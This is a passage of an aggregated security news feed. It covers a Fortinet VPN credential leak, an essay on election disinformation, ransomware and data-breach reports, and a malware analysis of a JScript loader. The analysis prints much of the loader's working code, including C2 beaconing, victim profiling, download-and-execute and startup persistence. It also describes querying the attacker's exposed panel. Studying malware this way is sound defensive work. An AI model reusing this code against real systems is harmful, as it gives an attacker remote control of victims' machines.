  • 1 Papua New Guinea
  • 1 Republic of the Congo
  • 1 Reunion

Reunion Some days after the leak, another threat on the same forum was published. A threat actor shared the dumped data from the list of vulnerable devices, that contains all the “sslpvn_websession” files for every IP.

As observed, these files reveal usernamespasswordsaccess levels (e.g., “full-access”, “root”), and the original unmasked IP addresses of the users connected to the VPNs.

The details exfiltrated from the vulnerable Fortinet VPNs and posted also on the forum is a file with a few megabytes, but expands over 7 GB when decompressed.

The exposure of passwords in these files can be abused by criminals to get a successful connection to the organization’s internal networks and bypass security restrictions as attackers are using, in some cases, high-privileged accounts. In other scenarios, these credentials could be reused by anyone with access to this dump to perform credential stuffing attacks.

Impact this leak

Although this flaw was been disclosed more than a year ago, several companies have yet to patch their systems – despite the many warnings from the security experts. As a result of this leak, an attacker can access the sslvpn_websession files from Fortinet VPNs to steal login credentials, which then could be used to compromise a network and deploy malware.

In Portugal, 136 devices are vulnerable and were shared in this leak.

Many professionals have already validated these credentials. A successful login to a VPN Fortinet portal of a random organization, and successful authentication through the  VPN Fortinet client with a leaked password can be seen in the next images.

At last, but not least, this is the time to implement an efficient patch management process and to fix a vulnerability after 2 years of its public disclosure.

Affected Products
FortiOS 6.0 – 6.0.0 to 6.0.4
FortiOS 5.6 – 5.6.3 to 5.6.7
FortiOS 5.4 – 5.4.6 to 5.4.12

(other branches and versions than above are not impacted)

ONLY if the SSL VPN service (web-mode or tunnel-mode) is enabled.

Solutions
Upgrade to FortiOS 5.4.13, 5.6.8, 6.0.5 or 6.2.0 and above.

More details here: https://www.fortiguard.com/psirt/FG-IR-18-384

Original Post at https://seguranca-informatica.pt/the-global-impact-of-the-fortinet-50-000-vpn-leak-posted-online/#.X8Dk581Kg2x

About the authors: Pedro Tavares

Pedro Tavares is a professional in the field of information security, working as an Ethical Hacker, Malware Analyst, Cybersecurity Analyst and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post The global impact of the Fortinet 50.000 VPN leak posted online appeared first on Security Affairs.

Positioned for success: Why Canada’s leading realtor was ready for the new normal

As a frontrunner in the use of digital property search and interactive mapping technology, Royal LePage (RLP) was a step ahead of the COVID-19 crisis by already having many of the tools for remote real estate services. Foremost among these is a reimagined intranet portal created and managed by WatServ, a Gold Level Microsoft Cloud…

The post Positioned for success: Why Canada’s leading realtor was ready for the new normal first appeared on IT World Canada.

Cyber Security Today – Ransomware hits fertility clinics, a news agency and a school board

Today's podcast reports on three of the latest ransomware attacks, a cyber attack on network equipment maker Beldon and a police effort to foil credit card scams

The post Cyber Security Today - Ransomware hits fertility clinics, a news agency and a school board first appeared on IT World Canada.

Undermining Democracy

Last Thursday, Rudy Giuliani, a Trump campaign lawyer, alleged a widespread voting conspiracy involving Venezuela, Cuba, and China. Another lawyer, Sidney Powell, argued that Mr. Trump won in a landslide, the entire election in swing states should be overturned and the legislatures should make sure that the electors are selected for the president.

The Republican National Committee swung in to support her false claim that Mr. Trump won in a landslide, while Michigan election officials have tried to stop the certification of the vote.

It is wildly unlikely that their efforts can block Joe Biden from becoming president. But they may still do lasting damage to American democracy for a shocking reason: the moves have come from trusted insiders.

American democracy’s vulnerability to disinformation has been very much in the news since the Russian disinformation campaign in 2016. The fear is that outsiders, whether they be foreign or domestic actors, will undermine our system by swaying popular opinion and election results.

This is half right. American democracy is an information system, in which the information isn’t bits and bytes but citizens’ beliefs. When peoples’ faith in the democratic system is undermined, democracy stops working. But as information security specialists know, outsider attacks are hard. Russian trolls, who don’t really understand how American politics works, have actually had a difficult time subverting it.

When you really need to worry is when insiders go bad. And that is precisely what is happening in the wake of the 2020 presidential election. In traditional information systems, the insiders are the people who have both detailed knowledge and high level access, allowing them to bypass security measures and more effectively subvert systems. In democracy, the insiders aren’t just the officials who manage voting but also the politicians who shape what people believe about politics. For four years, Donald Trump has been trying to dismantle our shared beliefs about democracy. And now, his fellow Republicans are helping him.

Democracy works when we all expect that votes will be fairly counted, and defeated candidates leave office. As the democratic theorist Adam Przeworski puts it, democracy is “a system in which parties lose elections.” These beliefs can break down when political insiders make bogus claims about general fraud, trying to cling to power when the election has gone against them.

It’s obvious how these kinds of claims damage Republican voters’ commitment to democracy. They will think that elections are rigged by the other side and will not accept the judgment of voters when it goes against their preferred candidate. Their belief that the Biden administration is illegitimate will justify all sorts of measures to prevent it from functioning.

It’s less obvious that these strategies affect Democratic voters’ faith in democracy, too. Democrats are paying attention to Republicans’ efforts to stop the votes of Democratic voters ­- and especially Black Democratic voters -­ from being counted. They, too, are likely to have less trust in elections going forward, and with good reason. They will expect that Republicans will try to rig the system against them. Mr. Trump is having a hard time winning unfairly, because he has lost in several states. But what if Mr. Biden’s margin of victory depended only on one state? What if something like that happens in the next election?

The real fear is that this will lead to a spiral of distrust and destruction. Republicans ­ who are increasingly committed to the notion that the Democrats are committing pervasive fraud -­ will do everything that they can to win power and to cling to power when they can get it. Democrats ­- seeing what Republicans are doing ­ will try to entrench themselves in turn. They suspect that if the Republicans really win power, they will not ever give it back. The claims of Republicans like Senator Mike Lee of Utah that America is not really a democracy might become a self-fulfilling prophecy.

More likely, this spiral will not directly lead to the death of American democracy. The U.S. federal system of government is complex and hard for any one actor or coalition to dominate completely. But it may turn American democracy into an unworkable confrontation between two hostile camps, each unwilling to make any concession to its adversary.

We know how to make voting itself more open and more secure; the literature is filled with vital and important suggestions. The more difficult problem is this. How do you shift the collective belief among Republicans that elections are rigged?

Political science suggests that partisans are more likely to be persuaded by fellow partisans, like Brad Raffensperger, the Republican secretary of state in Georgia, who said that election fraud wasn’t a big problem. But this would only be effective if other well-known Republicans supported him.

Public outrage, alternatively, can sometimes force officials to back down, as when people crowded in to denounce the Michigan Republican election officials who were trying to deny certification of their votes.

The fundamental problem, however, is Republican insiders who have convinced themselves that to keep and hold power, they need to trash the shared beliefs that hold American democracy together.

They may have long-term worries about the consequences, but they’re unlikely to do anything about those worries in the near-term unless voters, wealthy donors or others whom they depend on make them pay short-term costs.

This essay was written with Henry Farrell, and previously appeared in the New York Times.

SMB Skills Gaps and #COVID19 Imperil Cyber-Resilience

SMB Skills Gaps and #COVID19 Imperil Cyber-Resilience

Skills gaps and mass remote working are the biggest security challenges facing small- and medium-sized businesses (SMBs) today, according to new research from Infosecurity Europe.

The organizers behind the number one cybersecurity event in the region canvassed opinion from nearly 3700 industry experts via a Twitter poll.

A plurality (42%) cited a lack of security expertise as the number one challenge to cyber-resilience facing SMBs, while COVID-related lockdowns came second top with 34%.

According to the latest global figures, industry skills shortages have come down since last year, from 4.07 million to 3.12 million. However, while many are joining the industry, the narrowing gap can partly be explained by job losses during the pandemic.

SMBs often find it hardest to recruit and have fewer resources to spend on training. That’s a concern considering half (50%) of respondents claimed small firms are mainly responsible for in-house education and training.

SMBs are also often hardest hit by recession. A recent study from O2 and the Center for Economic Business Research (CEBR) claimed that small businesses would be hit six-times harder than after the financial crash of 2008.

Unsurprisingly, a quarter (24%) of small businesses said they are spending less because of the pandemic, with only 18% spending more to improve cyber-resilience. Perhaps reassuringly, over two-fifths (43%) said “little has changed” financially.

“Typical challenges such as lack of budget, staff being stretched thin and a changing threat environment have all been amplified in 2020. For many small businesses, the focus was on making sure they could still operate, and concerns like cyber-resilience were not necessarily a priority,” says Heidi Shey, principal analyst at Forrester Research.

“If business is down, cuts have to come from somewhere. Harder-hit sectors like retail or travel had to make different choices than those in a more fortunate position. Most spending was reactive; to support remote work, many had to make investments in things like laptops, VPNs and collaboration applications.”

Infosecurity Europe is scheduled to take place June 8-10 2021 at London’s Olympia.

Ransomware: IT Services Firm Faces $60 Million Recovery

France's Sopra Steria Was Hit By Previously Unseen Version of Ryuk Ransomware
French IT services firm Sopra Steria, which was hit with Ryuk ransomware in October, now estimates that the attack could cost the company up to $60 million in recovery costs. Experts say that after going quiet in March, Ryuk reappeared in September, and has targeted numerous hospitals.

Threat Actor: Unkown

Today I’d like to share a quick analysis on a quite new and unknown threat spotted in the wild. The file which grabbed my attention is called Loader.js (md5: 59a03086db5ebd33615b819a7c3546a5) and if you wish you can download it from Yomi. A very similar (or maybe the same) threat has been observed in the past months from the @MalwareHunterTeam which published the following Tweet about it. Despite the nice tweet, the thread ended up without any further action or attribution (at least in my understanding).

So I decided to share some little knowledge about this sample and about the infrastructure on its back-end. The purpose of my post is to take a closer look to such a threat, without pretending to attribute or to name it.

Analysis

The Javascript code is quite lean and it is shared in a clear text. No obfuscation techniques were involved in the current sample. The code is commented and the used syntax is punctual without contradictions during the file. Spaces, brackets, loops and variable assignments are clear, unique and always respectful of the file standards. Again no contradictions on syntax suggests the developer was an unique person which wrote the entire code without reuse or team swapping (or at least he spent much time to unify the syntax, which usually it makes not such a sense in the offensive world). The following code is a simple snip of what I meant by lean and respectful code syntax

// Loader version
var version = "OLD";

// Server
var server = "hxxp://93 .115. 21 .62/server/gate.php"; #modified by the blog author to avoid involuntary clik

// Interval between knocks in seconds
var interval = 181;

// How many times repeat failed task
var attemptsCount = 3;

// Status of running loader
var status = "Active";
// Path for download files
var wss = new ActiveXObject('WScript.Shell');
var defaultPath = wss.ExpandEnvironmentStrings('%APPDATA%');
var scriptFullPath = WScript.ScriptFullName;
var scriptName = WScript.ScriptName;
var fakeAutorunName = "MicrosoftOneDrive";
var shellObj = WScript.createObject("WScript.Shell");

// Connecting JSON module
ImportJSON();

// Collecting PC information
var clientInfo = GetClientInfo();

// Adding script to autorun

// Starting loader
while (status == "Active") {
    DoTasks(SendClientInfo());
    WScript.sleep(interval * 1000);
    DoTasks(SendKnock());
}

Initial section of the analyzed source code

The Javascript is made for acting in a Microsoft Windows environment, indeed it use classic execution techniques such as ActiveXObject running WScript.Shell against the victim system. The script per-se does not present innovative ways to execute code on machine and it looks like a quite simple but still effective software.

Main loop

The Javascript has a main loop to guarantee the correct execution. It is really straight forward by meaning it sends client information to command and control, it sleeps some seconds and finally it performs some tasks coming back from C2.

while (status == "Active") {
 DoTasks(SendClientInfo());
 WScript.sleep(interval * 1000);
 DoTasks(SendKnock());
}

Loader.js Main Loop

Both of the functions SendClientInfo() and SendKnock() have same styles. For example both of them instantiate a response variable which is returned and interpreted by DoTasks function.

function SendClientInfo() {
    var response;
    try {
        var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        var temp = WinHttpReq.Open("POST", server, false);
        WinHttpReq.SetRequestHeader("Content-Type", "application/json");
        WinHttpReq.SetRequestHeader("mode", "info");
        WinHttpReq.SetRequestHeader("uuid", clientInfo["uuid"]);
        WinHttpReq.SetRequestHeader("version", version);
        WinHttpReq.Send(JSON.stringify(clientInfo));
        WinHttpReq.WaitForResponse();
        response = WinHttpReq.ResponseText;
    } catch (objError) {
        response = objError + "\n"
        response += "WinHTTP returned error: " + 
            (objError.number & 0xFFFF).toString() + "\n\n";
        response += objError.description;
    }
    return response;
}

function SendKnock() {
    var response;
    try {
        var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        var temp = WinHttpReq.Open("POST", server, false);
        WinHttpReq.SetRequestHeader("Accept", "application/json");
        WinHttpReq.SetRequestHeader("mode", "knock");
        WinHttpReq.SetRequestHeader("uuid", clientInfo["uuid"]);
        WinHttpReq.SetRequestHeader("version", version);
        WinHttpReq.Send();
        WinHttpReq.WaitForResponse();
        response = WinHttpReq.ResponseText;
    } catch (objError) {
        response = objError + "\n"
        response += "WinHTTP returned error: " + 
            (objError.number & 0xFFFF).toString() + "\n\n";
        response += objError.description;
    }
    return response;
}

Very Clear Style, it looks like the TA won’t use false flags at all or messing around different code styles to emulate code reuse. The entire code looks like be a brand new code base, developed from scratch since no matches have been found.

C2 Communication

The command and control communication is made by the polling loop. The main loop periodically sends to C2 the client information and later it “knocks” to the server which sets up a response piggybacking a specific task to be performed on the victim. The following switch selector performs a simple — but still effective — backdoor, executing tasks on victims. The framework presents drop and execute capabilities, execution capabilities, assigned task monitoring and kill capabilities for blocking running taks.

       while ( (attempts > 0) && (result != 'True') ) {
            switch (tasks[task]["type"]) {
                case "Download & Execute":
                    result = DownloadAndExecute(tasks[task]["content"]);
                    if (result == 'False')
                        details = "Error: download or executing file failed";
                    break;
                case "Execute":
                    result = Execute(tasks[task]["content"]);
                    if (result == 'False')
                        details = "Error: executing file failed";
                    break;
                case "Terminate":
                    status = "Stopped";
                    result = 'True';
                    break;
                default:
                    result = 'False';
                    details = "Error: unknown task type";
                    break;
            }
            if (result == 'False')
                attempts--;
            else
                details = "Success";
            SendTaskResult(tasks[task]["id"], result, details);
        }

Switch on task type to perform actions on vitims

The most interesting functions (at least in my personal point of view) are the following ones: Download & Execute and Execute. The first one is used to spread other post exploitation frameworks to gain a more sophisticated control on the machine; for example a remote shell or a direct RDP connection. The second selector (Execute) is used to merely execute pure commands on the victim, it could be very useful to make some manual lateral movements or specific researches on the infected machine

Interesting to see that the switch function is protected against exceptions but the developer decided to not manage exceptions at all. For example taking a look to the following raw

result = DownloadAndExecute(tasks[task]["content"]);

it’s clear that the malware developer assumes that content exists in the tasks[task] section. Indeed if it does not exist an exception is raised but none is managing it. This is another distinctive decision made by the malware developer, which could be useful to attribution.

But one of the most interesting piece of software is in the way the developer (ab)use the WMI to extract information from local environment. In specific case we see UUID extraction

   // Retrieve UUID
    try {
        var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct"))
; !i.atEnd(); i.moveNext() )
        initInfo["uuid"] = i.item().UUID;
    } catch (err) {
        initInfo["uuid"] = 'N/A';
    }

IP extraction, this time basing on ipinfo.io

 // Retrieve client IP
    try {
        var ipReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        ipReq.Open("GET", "http://ipinfo.io/ip", false);
        ipReq.Send();
        ipReq.WaitForResponse();
        ipRes = ipReq.ResponseText;
        initInfo["ip"] = ipRes.replace(/^\s+|\s+$/g, '');
    } catch (err) {
        initInfo["ip"] = 'N/A';
    }
    

Country Extraction (based on IP)

    // Retrieve country
    try {
        var countryReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        countryReq.Open("GET", "http://ipinfo.io/country", false);
        countryReq.Send();
        countryReq.WaitForResponse();
        countryRes = countryReq.ResponseText;
        initInfo["location"] = countryRes.replace(/^\s+|\s+$/g, '');  
    } catch (err) {
        initInfo["location"] = 'N/A';
    }

OS Name Extraction

 // Retrieve OS name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem")); !i.a
tEnd(); i.moveNext() )
        initInfo["os"] = i.item().Caption;
    } catch (err) {
        initInfo["os"] = 'N/A';
    }

User Name and his Role Extraction

// Retrieve User name
    try {
        var shellObj = new ActiveXObject("WScript.Shell");
        var netObj = new ActiveXObject("WScript.Network");
        initInfo["user"] = netObj.ComputerName + '/' + shellObj.ExpandEnvironmentStrings("%USERNAME%");
    } catch (err) {
        initInfo["user"] = 'N/A';
    }

    // Retrieve user role
    try {
        initInfo["role"] = "User";
        var groupObj = GetObject("WinNT://" + netObj.UserDomain + "/" + shellObj.ExpandEnvironmentStrings("%USERNAME%"))
        for (propObj in groupObj.Members)
            if (propObj.Name == "Administrators")
                initInfo["role"] = "Admin";
    } catch (err) {
        initInfo["role"] = 'N/A';
    }

Antivirus installed Software Extraction

// Retrieve antivirus info
    try {
        var wmiAV = GetObject("winmgmts:root\\SecurityCenter2");
        for ( var i=new Enumerator(wmiAV.ExecQuery("SELECT * FROM AntivirusProduct")); !i.atEnd(); i.moveNext() )
            if (!initInfo["antivirus"])
                initInfo["antivirus"] = i.item().displayName;     
    } catch (err) {
        initInfo["antivirus"] = 'N/A';
    }

CPU, GPU, RAM and Total Storage

    // Retrieve CPU name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_Processor")); !i.atEnd()
; i.moveNext() )
            initInfo["cpu"] = i.item().Name;
    } catch (err) {
        initInfo["cpu"] = 'N/A';
    }

    // Retrieve GPU name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_VideoController")); !i.a
tEnd(); i.moveNext() )
            initInfo["gpu"] = i.item().Name;
    } catch (err) {
        initInfo["gpu"] = 'N/A';
    }

    // Retrieve RAM
    try {
        var ramObj = WScript.CreateObject("Shell.Application");
        initInfo["ram"] = Math.round(ramObj.GetSystemInformation("PhysicalMemoryInstalled") / 
1048576) + ' MB';
    } catch (err) {
        initInfo["ram"] = 'N/A';
    }
    
    // Retrieve total storage space
    try {
        var available = 0;
        var total = 0;
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_LogicalDisk")); !i.atEnd(); i.moveNext() ) {
            if (i.item().Size != null) {
                available += (i.item().FreeSpace / 1024 / 1024 / 1024);
                total += (i.item().Size / 1024 / 1024 / 1024);
            }
        }
        initInfo["storage"] = Math.round(available) + ' / ' + Math.round(total) + ' GB';
    } catch (err) {
        initInfo["storage"] = '0 / 0 GB';
    }

Finally the attacker uses a net view to check if there are more PC on the network. If the function gets back some results, the attacker might decide to perform some manual lateral movements by introducing (through the download and execute command) a new Post exploitation framework.

Persistence

The framework persistence and installation is performed by a simple entry in the autorun regkey as performed by the following function

function AddToAutorun() {
    try {
        startupPath = defaultPath + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
        fsObj = WScript.CreateObject('Scripting.FileSystemObject');   
        fsObj.CopyFile(scriptFullPath, startupPath);
    } catch (err) { return; }
}

AutoRun And Persistence

The defaultPath variable is previously set to wss.ExpandEnvironmentStrings('%APPDATA%'); so that the javascript is stored in the classic %APPDATA% folder which has the right user permissions and it gets executed on startup by the autorun registration.

External Resources

Another interesting point is in the way the attacker loads the external resources. In this script the developer uses the ImportJSON() which grabs the needed library online and then executes it through eval() statement. Again for the second time the attacker assumes that the library is reachable by the target PC, so the victim shall be placed in an environment where githubusercontent.com is not restricted. A simple way to block the execution of this loader in a wide infection scenario it would be to block the download of the json2.js library by filtering out the following url: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js

function ImportJSON() {
    var xObj = WSH.CreateObject('Microsoft.XMLHTTP'),
    fso = WSH.CreateObject('Scripting.FileSystemObject'),
    temp = WSH.CreateObject('WScript.Shell').Environment('Process')('temp'),
    j2lib = 'https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js'

    if (fso.FileExists(temp + '\\json2.js')) {
        j2lib = fso.OpenTextFile(temp + '\\json2.js', 1);
        eval(j2lib.ReadAll());
        j2lib.Close();
    }
    else {
        with (xObj) {
            open("GET", j2lib, true);
            setRequestHeader('User-Agent', 'XMLHTTP/1.0');
            send('');
        }

        while (xObj.readyState != 4) WSH.Sleep(50);
        eval(xObj.responseText);
        j2lib = fso.CreateTextFile(temp + '\\json2.js', true);
        j2lib.Write(xObj.responseText);
        j2lib.Close();
    }
}

Command And Control Web Panel

By taking a closer look to the Command and Control server, available at the following address: "hxxp://93 .115. 21 .62/server/ ,we might see the attacker let the directory named server free to list its content. We can now enumerate the entire directory making some guess on how the Command and Control web panel would work.

C2 Server listing folder

Fortunately it looks like the panel does not check the login session correctly letting me free to query the single .php files even without any real credential. For example performing a simple HTTP GET request to the drawAntivirusesChart.php we get the following result.

{
  "data": [
    {
      "name": "AhnLab V3 Lite",
      "count": 1
    },
    {
      "name": "Windows Defender",
      "count": 3
    },
    {
      "name": "Quick Heal Internet Security",
      "count": 1
    },
    {
      "name": "N\\/A",
      "count": 1
    },
    {
      "name": "SecureAPlus Antivirus",
      "count": 1
    },
    {
      "name": "Emsisoft Anti-Malware",
      "count": 1
    },
    {
      "name": "Webroot SecureAnywhere",
      "count": 1
    }
  ]
}

So we are able to query the C2 and getting back results in order to estimate how wide is the current attack surface and how is the current victimology. So let’s start on understanding the attack range. It looks like the file printSummaryOverview.php would definitely help us in having a quick overview. So let’s query it and see how big the infection looks like.

{"online":0,"onlineToday":4,"onlineWeek":9,"onlineMonth":9,"newToday":4,"newWeek":9,"newMonth":9,"dead":0}

We have actually a super small set of victims, maybe because they have been selected or maybe because it is an early stage threat (I would bet on the second hypothesis). By querying the printTopCountries.php I would expect to see target areas, indeed if you remember the Loader.js it checks from ipinfo the target country and location.

{"data":[["IN",2],["RU",1],["DE",3],["ES",1],["AZ",2]]}

Sweet ! Now, what if we can query, in the same way, the endpoint named printClients.php ? Will it be a kind of database dump with the entire victimology ? Yes it is !

{
  "draw": 0,
  "recordsTotal": 9,
  "recordsFiltered": 9,
  "data": [
    {
      "id": "2",
      "uuid": "18D68C6D-OMISSIS by Author",
      "ip": "115.69.OMISSIS by Author",
      "location": "IN",
      "os": "Microsoft Windows 8.1 Enterprise Evaluation",
      "user": "IE11W OMISSIS by Author/IEUser",
      "role": "N\\/A",
      "antivirus": "AhnLab V3 Lite",
      "cpu": "AMD A6-6310 APU with AMD Radeon R4 Graphics ",
      "ram": "4096 MB",
      "storage": "312 \\/ 465 GB",
      "network": "0",
      "added": "2020-11-21 17:50:58",
      "seen": "2020-11-21 18:05:48",
      "version": "OLD"
    },
    {
      "id": "3",
      "uuid": "032E02B4-OMISSIS by Author",
      "ip": "185.107.1OMISSIS by Author",
      "location": "RU",
      "os": "\\u041c\\u0430\\u0439\\u043a\\u0440\\u043e\\u0441\\u043e\\u0444\\u0442 Windows 10 Pro",
      "user": "DESK OMISSIS by Author H5\\/Admin",
      "role": "User",
      "antivirus": "Windows Defender",
      "cpu": "AMD Ryzen 5 PRO 3400G with Radeon Vega Graphics",
      "ram": "14284 MB",
      "storage": "535 \\/ 1009 GB",
      "network": "0",
      "added": "2020-11-21 22:35:17",
      "seen": "2020-11-21 22:38:18",
      "version": "OLD"
    },
    {
      "id": "4",
      "uuid": "67CDDC1F - OMISSIS by Author",
      "ip": "94.114.OMISSIS by Author",
      "location": "DE",
      "os": "Microsoft Windows 10 Pro",
      "user": "NQ OMISSIS by Author D1HVy",
      "role": "N\\/A",
      "antivirus": "Windows Defender",
      "cpu": "Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz",
      "ram": "4096 MB",
      "storage": "487 \\/ 511 GB",
      "network": "0",
      "added": "2020-11-21 23:48:48",
      "seen": "2020-11-21 23:48:48",
      "version": "OLD"
    },
   
---- snip ----


  ],
  "debug": "SELECT `id`, `uuid`, `ip`, `location`, `os`, `user`, `role`, `antivirus`, `cpu`, `ram`, `storage`, `network`, `added`, `seen`, `version` FROM `clients` "
}

Quite interesting the debugging strings as well. They show us the database composition.

We now have all the information we need ! We really don’t care about the graphical UI, but if you are curious about the panel .CSS, well you are just few clicks away from it 😉

Unknown TA Dasboard

Conclusion

The sample Loader.js (available HERE) is a new kind of simple loader with basic functionalities of command and control. From the sample it has been possible to identify the command and control infrastructure and with some luck its functionalities. Fortunately the victimology is so small that makes me thinking about an early stage system or maybe an emerging threat still under development.

One in Seven #BlackFriday Emails Are Malicious

One in Seven #BlackFriday Emails Are Malicious

More than one in seven emails sent on Black Friday today could be a scam, security experts have warned.

Vade Secure claims to protect one billion inboxes around the world with AI-powered security for Microsoft 365. Its Current Events tracker has detected a predictable spike in malicious messages containing text about the shopping discount extravaganza today.

It said 9% of US emails and 15% in Europe were malicious — spoofing big-name retail brands such as Lidl, Sephora, Target and, most popular, Amazon.

“We are issuing an alert about the Black Friday event in order to warn ISPs and businesses using Microsoft 365 to help them protect customers and clients from malicious emails. Seasonal threats of this nature can be predicted and monitored more easily than surprise attacks, so sysadmins should be aware of the surge in Black Friday email exploits,” explained Vade Secure’s chief product and services officer, Adrien Gendre.

“The rise of online shopping and home working has created new vectors for attackers, so security professionals need to guard carefully against new threats as they emerge. The best way to defeat email threats is to use complementary layers of protection involving both tech and humans.”

The United States Cybersecurity and Infrastructure Security Agency (CISA) also issued an alert today, warning that criminals may be looking to cash-in both online and in-person.

“Malicious people may be able to obtain personal information (such as credit card numbers, phone numbers, account numbers and addresses) by stealing your wallet, overhearing a phone conversation, rummaging through your trash (a practice known as dumpster diving) or picking up a receipt at a restaurant that has your account number on it,” it claimed.

“If a thief has enough information, he or she may be able to impersonate you to purchase items, open new accounts or apply for loans.”

The agency urged shoppers to check company privacy policies, monitor their bank statements, use passwords and other security features where available and to avoid sharing personal information online.

Details of 16 million Brazilian COVID-19 patients exposed online

The personal and health details of more than 16 million Brazilian COVID-19 patients, including Government representatives, have been exposed online.

Personal and health details of more than 16 million Brazilian COVID-19 patients has been accidentally exposed online due to an error of an employee of a Brazilian hospital.

An employee of Albert Einstein Hospital in Sao Paolo has uploaded a spreadsheet containing usernames, passwords, and access keys to sensitive government systems on GitHub.

The spreadsheet contained the login credentials for several systems, including the E-SUS-VE and Sivep-Gripe applications that are used to manage data on COVID-19 patients.

The archive includes data belonging to government representatives, including Brazil President Jair Bolsonaro, seven ministers, and 17 provincial governors.

The exposed data includes patient names, addresses, ID information, but also healthcare records such as medical history and medication regimes.

COVID-19

The data leak was discovered by a GitHub user who found the spreadsheet containing the credentials on the GitHub account associated with the hospital employee.

The user shared his discovery with the Brazilian newspaper Estadao, which notified the Brazilian Ministry of Health and the hospital.

The spreadsheet was promptly removed from GitHub and the passwords and the access keys for the systems were changed.

Pierluigi Paganini

(SecurityAffairs – hacking, COVID-19)

The post Details of 16 million Brazilian COVID-19 patients exposed online appeared first on Security Affairs.

Hashtag Trending – Amazon server outage; Shopify gets a shoutout in the NYT; Raspberry Pi hacks a Tesla

An Amazon outage knocks out connected vacuum cleaners and other “smart” objects, Shopify gets a shoutout in the New York Times as its compared to Amazon, and a Tesla gets hacked with a Raspberry Pi.

The post Hashtag Trending - Amazon server outage; Shopify gets a shoutout in the NYT; Raspberry Pi hacks a Tesla first appeared on IT World Canada.

NHS Error Exposes Data on Hundreds of Patients and Staff

NHS Error Exposes Data on Hundreds of Patients and Staff

Hundreds of NHS patients and staff have had their personal data exposed to strangers after internal process failures, it has emerged this week.

Human error at NHS Highland earlier this month led to the personal information of 284 patients with diabetes being shared via email with 31 individuals, according to local reports.

Although details of medical history were not in the spreadsheet accidentally sent to the 31 people, it did apparently include names, dates of births, contact information and hospital identification numbers.

That’s more than enough to craft convincing follow-on phishing emails.

The affected patients have been contacted and the Information Commissioner’s Office (ICO) notified, although it is not the first time the trust has been found wanting. In 2018 it apparently exposed the names of over 30 patients with HIV.

“Due to the fact that the information was stored on a spreadsheet and easily emailed out serves as a reminder that even if organizations have good security controls, they will not be effective unless there is a culture of security and staff understand the importance of securing data,” argued KnowBe4 security awareness advocate, Javvad Malik.

“It is an organization’s responsibility to inform staff of the importance of cybersecurity and provide the tools, training and processes needed to keep information secure.”

The second breach was reported at Basingstoke hospital, run by Hampshire Hospitals NHS Foundation Trust in southern England.

Although reported to the ICO in July, it has only just come to light in papers published by the trust, according to local media.

This time a spreadsheet containing personal information on 1000 members of staff at the hospital was shared with senior managers.

The same hospital suffered another breach the following month, after details of a woman who suffered a stillbirth were apparently published online.

The healthcare sector suffered 214 reported data incidents in Q1 2020-21, more than any other and accounting for about 15% of the total for the period, according to the ICO.

Human error accounted for a large number of these incidents. For example, incidents involving  data emailed, posted or faxed to incorrect recipients and incorrect use of BCC comprised nearly a third (30%) of the total.

Staying safe while gaming: how to ensure your children don’t become victims of financial fraud

Protect your children from financial frauds when gamingIf you’re a parent and haven’t been in touch with gaming for a while, you’d be surprised at...

The post Staying safe while gaming: how to ensure your children don’t become victims of financial fraud appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.

Canon publicly confirms August ransomware attack and data breach

Canon finally confirmed that it has suffered a ransomware attack in early August that resulted in the theft of data from its servers.

Canon has finally confirmed that it was the victim of a ransomware attack in early August and that the threat actors also stole data from its servers.

In August, ZDNet first revealed the ransomware attack after it has obtained an internal memo that confirmed the outage suffered by Canon a few days before was caused by a ransomware attack.

The memo also reveals that the company has hired an external security firm to investigate the incident.

The problem was first reported by Bleepingcomputer, which tracked a suspicious outage on Canon’s image.canon cloud photo and video storage service. According to the media outlet, the incident resulted in the loss of data for users of their free 10GB storage feature.

The image.canon site suffered an outage on July 30th, 2020, that lasted for six days, until August 4th.

At the time the company only confirmed an internal investigation on a problem related to “10GB of data storage.”

Canon incident notice
Source BleepingComputer

According to Canon, some of the photo and image files saved prior to June 16 were “lost,” but it pointed out that they were not exposed in a data leak.

In mid-August, the Maze ransomware gang took credit for the attack and published unencrypted files allegedly stolen the Canon during the ransomware attack.

BleepingComputer obtained from its source a portion of the ransom note and an internal notification that Canon sent to its employees.

canon internal-notice
Canon internal notice – Source BleepingComputer

Maze ransomware operators started publishing data stolen from the company on its data leak site. The gang has published a 2.2 GB archive called “STRATEGICPLANNINGpart62.zip” that attackers claim contain around 5% of the total amount of documents stolen during the attack,

The archive contains files related to Canon’s website and marketing materials, according to BleepingComputer’s source it does not appear to contain any financial information, employee information, or other sensitive data.

The investigation conducted by Canon found evidence of unauthorized accesses on its network between July 20 and August 6.

The hackers accessed company file servers that contained information about current and former employees from 2005 to 2020 and their beneficiaries and dependents.

This week, Canon confirmed the ransomware attack and the data breach, according to a company’s statement stolen data included employees’ names, Social Security number, date of birth, the number for the driver’s license number or government-issued ID, the bank account number for direct deposits from Canon, and their electronic signature.

“We identified a security incident involving ransomware on August 4, 2020.” reads the statement. “We determined that there was unauthorized activity on our network between July 20, 2020 and August 6, 2020.  During that time, there was unauthorized access to files on our file servers. We completed a careful review of the file servers on November 2, 2020 and determined that there were files that contained information about current and former employees from 2005 to 2020 and their beneficiaries and dependents.”

On November 1, the Maze gang shut down its operations. The list of victims of the gang is long and includes the Steel sheet giant Hoa Sen GroupSouthwireLG ElectronicsXerox, and City of Pensacola

Pierluigi Paganini

(SecurityAffairs – hacking, Canon)

